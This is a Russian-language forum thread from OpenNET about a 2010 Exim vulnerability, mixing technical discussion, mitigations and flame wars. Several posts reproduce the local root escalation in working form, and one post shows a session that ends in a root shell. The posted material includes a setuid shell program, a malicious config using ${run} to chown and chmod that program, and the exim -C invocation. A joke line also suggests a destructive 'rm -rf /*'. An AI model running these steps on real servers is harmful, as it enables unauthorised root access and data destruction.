The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]



"В Exim обнаружена критическая уязвимость, позволяющая получи..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от opennews (?), 09-Дек-10, 17:47 
В популярном почтовом сервере Exim найдена (http://www.exim.org/lurker/message/20101207.215955.bb32d4f2....) критическая уязвимость, позволяющая удаленному злоумышленнику выполнить свой код на сервере с привилегиями суперпользователя. Уязвимость была выявлена в результате анализа причин взлома одного из серверов. Проанализировав собранный при помощи tcpdump слепок трафика на момент взлома, было выявлено, что взлом был произведен через определенным образом оформленный в секции "DATA" сверхбольшой блок данных, содержащий в своем теле блок "HeaderX: ${shell-код}".


С целью предотвращения волны проведения атак, до выпуска обновления представлено только общее описание атака, детали не разглашаются. Так как в определенных кругах подробности с методом эксплуатации данной проблемы уже известны, всем администраторам рекомендуется временно заблокировать работу почтового сервера или  переконфигурировать (http://www.exim.org/exim-html-3.20/doc/html/spec_55.html) Exim для работы под неприви...

URL: http://www.exim.org/lurker/message/20101207.215955.bb32d4f2....
Новость: https://www.opennet.ru/opennews/art.shtml?num=28945

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +4 +/
Сообщение от б.б. (?), 09-Дек-10, 17:47 
Больше интересен не эксплоит, а то, каким макаром в дебиане, из-под обычного пользователя так запросто рута дают?

На кой тогда его не под рутом запускают, если так запросто рута получить???

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от zmey (?), 09-Дек-10, 17:54 
читаем между строк:
"был сформирован файл "setuid" c кодом, призванным предоставить shell-доступ,"
Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

7. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от non anon (?), 09-Дек-10, 18:32 
Насколько я понял, на этапе инициализации он все равно от рута работает, что и позволяет (через специальный конфиг) подарить зловреду suid-бит.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

12. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  –2 +/
Сообщение от NaN (?), 09-Дек-10, 18:51 
Когда вы начните учить матчасть?
Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

15. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от non anon (?), 09-Дек-10, 19:21 
У вас какая-то особенная матчасть, которой нет у других?
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

26. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от гы (?), 09-Дек-10, 21:10 
конфиг читается от рута, в конфиге указано run { chmod 4755 ... } - троян делается суидным именно рутом. но вот кто же даст писать непривилегированному юзеру писать в /etc/exim/e.conf ???
Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

31. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 09-Дек-10, 22:48 
они писали e.conf в /var/spool/exim4/
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

35. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от txt (??), 09-Дек-10, 23:58 
по дефолту exim читает из /var/spool/exim4/ конфиги?
Ответить | Правка | ^ к родителю #31 | Наверх | Cообщить модератору

36. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 00:32 
нет :) они его "по дефолту" запускали из этого каталога шеллкодом :)
Ответить | Правка | ^ к родителю #35 | Наверх | Cообщить модератору

59. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от tux2002email (ok), 10-Дек-10, 12:10 
> На кой тогда его не под рутом запускают, если так запросто рута
> получить???

Бинарник exim setuid ный от рута. При локальной доставке письма начальный процесс рутовый и делает setuid setgid до пользователя получателя. так во многих дистрибутивах. В документации непривилегированный вариант запуска назван "экзотическим" но возможен.

Вот моя заметка на эту тему https://www.opennet.ru/tips/2452_mail_exim.shtml, только сейчас у меня немного подругому.

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +8 +/
Сообщение от Viliar (ok), 09-Дек-10, 17:52 
Убиться. Кто-то тут давеча рассказывал, что exim был чуть ли не переписан и теперь там с безопасностью все пучком... Те, кто опускал усиленно postfix :-)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

10. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от SubGun (??), 09-Дек-10, 18:50 
Пока систему разрабатывает человек, в ней никогда не может быть 100%-ой безопасности.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

24. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Viliar (ok), 09-Дек-10, 21:01 
Это понятно. Но я вот о таком:

http://opennet.ru/openforum/vsluhforumID3/64241.html#20
http://opennet.ru/openforum/vsluhforumID3/64241.html#22

Кастуем в тред "ALex_hha" :-)

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

25. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от artemrts (ok), 09-Дек-10, 21:07 
> Это понятно. Но я вот о таком:
> http://opennet.ru/openforum/vsluhforumID3/64241.html#20
> http://opennet.ru/openforum/vsluhforumID3/64241.html#22
> Кастуем в тред "ALex_hha" :-)

А чот я давно этого парня здесь не слышал:-)

Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

80. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Pilat (ok), 10-Дек-10, 17:57 
На тот момент он был прав, разве не так ?
Ответить | Правка | ^ к родителю #24 | Наверх | Cообщить модератору

109. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Viliar (ok), 11-Дек-10, 17:39 
> На тот момент он был прав, разве не так ?

В чем прав? В том, что buffer owerflow судя по changelog фиксять сравнительно регулярно до сих пор? :-) Отвечая на ваш вопрос - нет, в том споре не прав.

Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

112. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от SubGun (??), 12-Дек-10, 00:48 
Ну а я считаю, что он прав. Насчет криворукости того админа тоже. Не сочтите за флуд, но у меня почтовик(Exim) обслуживает 15 доменов и рассылку(почти 400 000 писем в день). Ни разу за 5 лет не было нареканий по поводу его работы. О "buffer overflow" вообще только в сказках слышал.
Ответить | Правка | ^ к родителю #109 | Наверх | Cообщить модератору

126. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Viliar (ok), 23-Дек-10, 18:30 
> Ну а я считаю, что он прав. Насчет криворукости того админа тоже.
> Не сочтите за флуд, но у меня почтовик(Exim) обслуживает 15 доменов
> и рассылку(почти 400 000 писем в день). Ни разу за 5
> лет не было нареканий по поводу его работы. О "buffer overflow"
> вообще только в сказках слышал.

Очевидно, что Вам
a) Повезло
b) Changelog'и Вы ну совсем не читаете.

Ответить | Правка | ^ к родителю #112 | Наверх | Cообщить модератору

4. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от Аноним (-), 09-Дек-10, 18:15 
в момент взлома был включен tcpdump?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

5. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от axe (??), 09-Дек-10, 18:20 
я тоже что то не понял. у них он перманентно включен что ли? =)
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

9. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от xeonemail (??), 09-Дек-10, 18:42 
Угу, сидят фтыкают в вывод с -X, мониторят взломы:)
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

13. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от pavlinux (ok), 09-Дек-10, 18:52 
> я тоже что то не понял. у них он перманентно включен что ли? =)

Видимо не первый случай :)

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

23. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от dejuren (?), 09-Дек-10, 20:32 
"не первый случай" + honeypot
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

60. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от PereresusNeVlezaetBuggyemail (ok), 10-Дек-10, 12:16 
> я тоже что то не понял. у них он перманентно включен что
> ли? =)

Ну вот у меня pflogd на некоторых серверах сохраняет весь интересный траффик за несколько дней. На всякий пожарный. А что, современные винты позволяют. Система со всеми примочками укладывается в пару гигабайт, остальное место забиваем рабочими данными, а также такими вот служебными.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

71. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 15:26 
>> я тоже что то не понял. у них он перманентно включен что
>> ли? =)
> Ну вот у меня pflogd на некоторых серверах сохраняет весь интересный траффик
> за несколько дней. На всякий пожарный. А что, современные винты позволяют.
> Система со всеми примочками укладывается в пару гигабайт, остальное место забиваем
> рабочими данными, а также такими вот служебными.

Круто, молодец.

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

6. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от dimss (?), 09-Дек-10, 18:27 
Ключевой момент:

create another file e.conf with following content:
spool_directory = ${run{/bin/chown
root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}

the he runs:
exim -Ce.conf -q

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

8. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  –1 +/
Сообщение от pavlinux (ok), 09-Дек-10, 18:35 
pavel@suse64:/tmp> > test
pavel@suse64:/tmp> chown root:root test
chown: изменение владельца `test': Операция не позволяется

Значить Ехим должен был от рута работать. Тогда ничего удивительного нет,
если сервак запущенный от рута считывает пользовательские конфиги и есть команда ${run}

Можно было бы и ${run {su -c "rm -rf /*"}}

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

11. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 09-Дек-10, 18:51 
Если я правильно понимаю, он запускается с правами рута, а потом сбрасывает привилегии. И косяк в том, что конфиг парсится до сброса привилегий, при этом ещё и выполняет shell-команды
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

18. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +15 +/
Сообщение от б.б. (?), 09-Дек-10, 20:12 
> Если я правильно понимаю, он запускается с правами рута, а потом сбрасывает привилегии. И косяк в том, что конфиг парсится до сброса привилегий, при этом ещё и выполняет shell-команды

Зимело.

Одинокий парсер бродил по конфигу Exim. Команды в exim были рыхлые и неровные, как первый снег, из-за комментариев и тут и там торчали shell-команды, и парсер всякий раз спотыкался об них, и ворча, начинал их исполнять. И вот он нашёл её, команду, которую бросился исполнять прямо от рута.

И в воздухе невообразимо запахло виндой.

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

38. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Мужик32email (ok), 10-Дек-10, 02:01 
Схоронил.
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

49. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от ЬТЛ (?), 10-Дек-10, 09:36 
я думаю там еще и смеркалось ;)
Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

21. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Sw00p aka Jerom (?), 09-Дек-10, 20:21 
какой парсинг ?

что хекеры блин ждут момента када админ перезапустит экзим ?

да на момент парсинга конфига сокет даже не открывается

Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

73. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 15:36 
> какой парсинг ?
> что хекеры блин ждут момента када админ перезапустит экзим ?
> да на момент парсинга конфига сокет даже не открывается

а sbin у exim-а зачем стоит?

Ответить | Правка | ^ к родителю #21 | Наверх | Cообщить модератору

74. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 15:36 
>> какой парсинг ?
>> что хекеры блин ждут момента када админ перезапустит экзим ?
>> да на момент парсинга конфига сокет даже не открывается
> а sbin у exim-а зачем стоит?

Пардон, tr/sbin/suid/

Ответить | Правка | ^ к родителю #73 | Наверх | Cообщить модератору

97. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Витольд Седышев (?), 11-Дек-10, 14:13 
Наверное что бы захватить SMTP порт!
Ответить | Правка | ^ к родителю #74 | Наверх | Cообщить модератору

110. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 11-Дек-10, 19:35 
> Наверное что бы захватить SMTP порт!

один про валенки, другой про синее

Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

16. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от artemrts (ok), 09-Дек-10, 19:46 
А как-то уже отвыклось от таких серьезных ошибках в Эксиме...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

17. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Wormik (ok), 09-Дек-10, 20:09 
Кто-то нашел уязвимость, взломал чей-то сервер, и когда взламывали, подробности уязвимости сумели обнародовать?

Чей сервер взломали? Когда и кто?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

19. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от б.б. (?), 09-Дек-10, 20:12 
> Кто-то нашел уязвимость, взломал чей-то сервер, и когда взламывали, подробности уязвимости
> сумели обнародовать?
> Чей сервер взломали? Когда и кто?

Сначала патч, потом твоё любопытство.

Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

27. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от pvgemail (?), 09-Дек-10, 21:59 
делаем от себя простого  юзера
[pvg@c]$ id
uid=231(pvg) gid=500(pvg) группы=500(pvg)

int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, 0);
execl("/bin/sh", "sh", 0);
}

gcc -o setuid setuid.c

cat c.conf
[pvg@c]$ cat c.conf
spool_directory = ${run{/bin/chown \
root:root /home/pvg/c/setuid}}${run{/bin/chmod 4755 /home/pvg/c/setuid}}
[pvg@c]$ /usr/sbin/exim -Cc.conf -q
2010-12-09 21:44:50 Failed to create directory "": No such file or directory
[pvg@c]$ ls -l
итого 20
-rw-rw-r--    1 pvg      pvg           110 Дек  9 21:39 c.conf
-rwsr-xr-x    1 pvg      pvg         11915 Дек  9 21:40 setuid
-rw-rw-r--    1 pvg      pvg           103 Дек  9 21:36 setuid.c

ииии получаем.....
а где root????.... бит s вижу, а рута нет
где ошибка??????????

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

28. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 09-Дек-10, 22:04 
> [pvg@c]$ /usr/sbin/exim -Cc.conf -q

.
Запускать нужно от пользователя до которого exim сбрасывает привилегии.

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

29. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от pvgemail (?), 09-Дек-10, 22:32 
>after that attacker gets shell with id of user Debian-exim and cwd
>in /var/spool/exim4

?then it put file there file setuid with trivial execution of root shell:
>[оверквотинг удален]
>execl("/bin/sh", "sh", NULL);
>}
>
>and create another file e.conf with following content:
>spool_directory = ${run{/bin/chown
>root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4>/setuid}}
>the he runs:
>exim -Ce.conf -q
>and gets suid bit on /var/spool/exim4/setuid
>everything else is trivial.

suid да но от exim , а не от root
я

Ответить | Правка | ^ к родителю #28 | Наверх | Cообщить модератору

30. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Одмин (?), 09-Дек-10, 22:47 
Где патчи??
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

37. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Дмитрий (??), 10-Дек-10, 00:59 
chmod -w /var/spool/exim4/ на первое время поставил, от дураков...
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

39. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Одмин (?), 10-Дек-10, 03:49 
Спасибо. Пока самое адекватное решение от скрипт-киддис и ботов. Судя по mailing list девелоперов понесло не совсем в ту степь и вообще у них траблы с воспроизведением проблемы.
Ответить | Правка | ^ к родителю #37 | Наверх | Cообщить модератору

40. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от утер (?), 10-Дек-10, 05:35 
А еще это решение отлично помогает от спама - 100% срезается
Ответить | Правка | ^ к родителю #39 | Наверх | Cообщить модератору

50. "RLY?"  +/
Сообщение от Дмитрий (??), 10-Дек-10, 09:40 
А вот и нет. К сожалению...
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

32. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 09-Дек-10, 22:59 
                 When this option is used by a caller other than root or the Exim user, and the list  is  different  from
                 the compiled-in list, Exim gives up its root privilege immediately, and runs with the real and effective
                 uid and gid set to those of the caller. However, if ALT_CONFIG_ROOT_ONLY is defined  in  Local/Makefile,
                 root privilege is retained for -C only if the caller of Exim is root.

Похоже в Debian не используется ALT_CONFIG_ROOT_ONLY...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

33. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от pvgemail (?), 09-Дек-10, 23:22 
и так

bash-3.2$ uname -a
Linux hhh.ddd.xxxx 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
bash-3.2$ cat suid.c
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, 0);
execl("/bin/sh", "sh", 0);
}
bash-3.2$ ls -l
итого 40
-rw-r--r-- 1 exim exim  118 Дек  9 23:12 c.conf
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 db
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 input
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 msglog
-rwxr-xr-x 1 exim exim 7158 Дек  9 23:08 suid
-rw-r--r-- 1 exim exim  104 Дек  9 23:05 suid.c
bash-3.2$ id
uid=93(exim) gid=93(exim) группы=12(mail),93(exim)
bash-3.2$ cat c.conf
spool_directory = ${run{/bin/chown \
root:root /var/spool/exim/setuid}}${run{/bin/chmod 4755 /var/spool/exim/setuid}}
bash-3.2$ exim -C c.conf -q
bash-3.2$ ls -l
итого 40
-rw-r--r-- 1 exim exim  118 Дек  9 23:12 c.conf
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 db
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 input
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 msglog
-rwxr-xr-x 1 exim exim 7158 Дек  9 23:08 suid
-rw-r--r-- 1 exim exim  104 Дек  9 23:05 suid.c
bash-3.2$ pwd
/var/spool/exim
bash-3.2$
---------------------------
где suid root ?
может и остальное тоже ?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

34. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от pvgemail (?), 09-Дек-10, 23:46 
Извините, ошибся, у меня suid, в конфе setuid
к сожалению в el5 работает, а в RH9 НЕТ
bash-3.2$ id
uid=93(exim) gid=93(exim) группы=12(mail),93(exim)
bash-3.2$ ls -l
итого 40
-rw-r--r-- 1 exim exim  114 Дек  9 23:38 c.conf
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 db
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 input
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 msglog
-rwxr-xr-x 1 exim exim 7158 Дек  9 23:43 suid
-rw-r--r-- 1 exim exim  104 Дек  9 23:05 suid.c
bash-3.2$ exim -C c.conf -q
bash-3.2$ cat c.conf
spool_directory = ${run{/bin/chown \
root:root /var/spool/exim/suid}}${run{/bin/chmod 4755 /var/spool/exim/suid}}
bash-3.2$ ls -l
итого 40
-rw-r--r-- 1 exim exim  114 Дек  9 23:38 c.conf
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 db
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 input
drwxr-x--- 2 exim exim 4096 Июл 13 16:20 msglog
-rwsr-xr-x 1 root root 7158 Дек  9 23:43 suid
-rw-r--r-- 1 exim exim  104 Дек  9 23:05 suid.c
bash-3.2$ ./suid
sh-3.2# id
uid=0(root) gid=0(root)
sh-3.2#
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

41. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Docent (??), 10-Дек-10, 07:34 
А я пока сделал так от рута
>e.conf && chmod 400 e.conf
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

75. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 15:46 
> А я пока сделал так от рута
>>e.conf && chmod 400 e.conf

и как оно поможет?

Ответить | Правка | ^ к родителю #41 | Наверх | Cообщить модератору

42. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  –3 +/
Сообщение от csup (?), 10-Дек-10, 08:06 
1. Тем у кого стоит exim - Немедленно снести.
2. Найти знакомых-умников, кто с пеной доказывал что exim лучше и безопаснее postfix и повозить рожей по столу.

Go.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от патрон (?), 10-Дек-10, 08:21 
готово. я сделал.
спасибо за подробную инструкцию-наловил лулзов с любителей exim.
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

69. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +2 +/
Сообщение от IGX (?), 10-Дек-10, 13:53 
Лучше не использовать компы вообще - так уж точно безопасно... Если, конечно, кирпич с неба не свалится.
Ответить | Правка | ^ к родителю #42 | Наверх | Cообщить модератору

43. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 08:16 
да просто отменить suid в каталоге спула exim через моунт,
обычно это так делается, а то занервничали :)
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

45. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Бару (?), 10-Дек-10, 08:38 
... а если спул exim-а находится на разделе на который нет возможности поставить nosuid . Как в этом случае быть? (не удаляя exim ^)
Ответить | Правка | ^ к родителю #43 | Наверх | Cообщить модератору

46. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +4 +/
Сообщение от утер (?), 10-Дек-10, 08:59 
dd if=/dev/zero of=/var/exim.file bs=1M count=1024
mkfs.ext3 -m0 /var/exim.file
mount -o loop,nosuid /var/exim.file /var/spool/exim
не ?
Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

47. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  –1 +/
Сообщение от Аноним (-), 10-Дек-10, 09:14 
а это уже проблема безопасности, не надо ложить яйца в одну корзину :)
Ответить | Правка | ^ к родителю #45 | Наверх | Cообщить модератору

48. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от lissyaraemail (?), 10-Дек-10, 09:17 
чё за истерия...
я ещё в 18:00 вчерась у себя на всех сделал, и спал спокойно

srv0# mount|grep spool
tmpfs on /var/spool/exim (tmpfs, local, nosuid)
tmpfs on /home/jails/mx.lissyara.su/var/spool/exim (tmpfs, local, nosuid)
srv0#

Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

52. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 10-Дек-10, 11:07 
О, великий и ужасный lissyara, низкий поклон уважаемому покорителю BSD. )
Дайте сцылку, плз, чем tmpfs прекрасней tmpmfs?
P.S. Сорри за оффтоп.
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

81. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +1 +/
Сообщение от sammemail (ok), 10-Дек-10, 18:20 
> srv0# mount|grep spool
> tmpfs on /var/spool/exim (tmpfs, local, nosuid)
> tmpfs on /home/jails/mx.lissyara.su/var/spool/exim (tmpfs, local, nosuid)
> srv0#

tmpfs на спуле? Т.е. при внезапном power failure вся неушедшая почта уходит в девнул? странный повод для гордости.


Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

84. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  –1 +/
Сообщение от lissyaraemail (?), 10-Дек-10, 18:53 
>> srv0# mount|grep spool
>> tmpfs on /var/spool/exim (tmpfs, local, nosuid)
>> tmpfs on /home/jails/mx.lissyara.su/var/spool/exim (tmpfs, local, nosuid)
>> srv0#
> tmpfs на спуле? Т.е. при внезапном power failure вся неушедшая почта уходит
> в девнул? странный повод для гордости.

ну, не все же сервера дома под столом держат, или на железе кривом, что в панику падает на ровных местах =)

бесперебойник, электроснабжение здания по первой категории, с двумя вводами от разных подстанций - у меня нет причин для беспокойства.

Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

89. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +2 +/
Сообщение от sammemail (ok), 10-Дек-10, 19:44 
>ну, не все же сервера дома под столом держат, или на железе кривом, что в панику падает на ровных местах =)

Вот как меня подобное радует. Вы со времен терок про proftpd совсем не изменились.

1) Я не держу (и не держал) сервера дома, если не считать в (много лет назад) фидошный хаб и BBS (хихи).
2) Сервера - преимущественно Dell, от 2950 и выше, ну и HP блейды.
3) Тем не менее я замечательно видел как некривое железо начинает дохнуть. Еще видел как КЗ в системе с двумя БП прекрасно себе убивало материнку и толку от второго БП было чуть меньше чем 0.
4) Если бы все было так просто как вы написали - не заморачивались бы рейд вендоры BBU, а вендору БД - ACID транзакциями. Для меня вот - потеря спула является критичным фейлом, так как при этом потеряется огромное количество писем и я даже не смогу сказать что именно было потеряно.
5) Трапы и фри и линукса на самом прямом железе я видел достаточное количество раз, а некоторые даже сам репортил. В том числе и самые что ни на есть hardware independent.

Ответить | Правка | ^ к родителю #84 | Наверх | Cообщить модератору

95. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 11-Дек-10, 06:03 
Поддерживаю, чем больше парк машин, тем больше возникает "странностей" и тем быстрее пропадает иллюзия надежности железа/системы/апс-ок/...
Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

106. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  –2 +/
Сообщение от lissyaraemail (?), 11-Дек-10, 17:17 
>>ну, не все же сервера дома под столом держат, или на железе кривом, что в панику падает на ровных местах =)
> Вот как меня подобное радует. Вы со времен терок про proftpd совсем
> не изменились.

и не планирую. как я был неадекватом всю жизнь, так и помру им =))
что касается истории с proftpd - там лишь подтвердилось моё убеждение - пока матом когонгить [кто программить умеет] не обкроешь - ничего сделано не будет =)

спасибо за сделанное, кстати. непомню, говорил или нет.

> 1) Я не держу (и не держал) сервера дома, если не считать
> в (много лет назад) фидошный хаб и BBS (хихи).

я один держу, на антресолях. с ненужными данными =))
за 15 минут систему из бэкапа разверну если что, а данных непродублированных - там нет.

>[оверквотинг удален]
> блейды.
> 3) Тем не менее я замечательно видел как некривое железо начинает дохнуть.
> Еще видел как КЗ в системе с двумя БП прекрасно себе
> убивало материнку и толку от второго БП было чуть меньше чем
> 0.
> 4) Если бы все было так просто как вы написали - не
> заморачивались бы рейд вендоры BBU, а вендору БД - ACID транзакциями.
> Для меня вот - потеря спула является критичным фейлом, так как
> при этом потеряется огромное количество писем и я даже не смогу
> сказать что именно было потеряно.

для меня - тока в одном месте эта потеря являтся критической.
но там /var отдельно.

> 5) Трапы и фри и линукса на самом прямом железе я видел
> достаточное количество раз, а некоторые даже сам репортил. В том числе
> и самые что ни на есть hardware independent.

давно не видел, именно на прямом. но - из совсем прямого - тока пролианты остались, так что сравнивать не с чем.

Ответить | Правка | ^ к родителю #89 | Наверх | Cообщить модератору

111. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от Аноним (-), 11-Дек-10, 19:39 
>> 4) Если бы все было так просто как вы написали - не
>> заморачивались бы рейд вендоры BBU, а вендору БД - ACID транзакциями.
>> Для меня вот - потеря спула является критичным фейлом, так как
>> при этом потеряется огромное количество писем и я даже не смогу
>> сказать что именно было потеряно.
> для меня - тока в одном месте эта потеря являтся критической.
> но там /var отдельно.

ууу... еще и вар не отдельной фс, как все печально у вас, однако.

Ответить | Правка | ^ к родителю #106 | Наверх | Cообщить модератору

120. "В Exim обнаружена критическая уязвимость, позволяющая получи..."  +/
Сообщение от lissyaraemail (?), 15-Дек-10, 00:46 
>>> 4) Если бы все было так просто как вы написали - не
>>> заморачивались бы рейд вендоры BBU, а вендору БД - ACID транзакциями.
>>> Для меня вот - потеря спула является критичным фейлом, так как
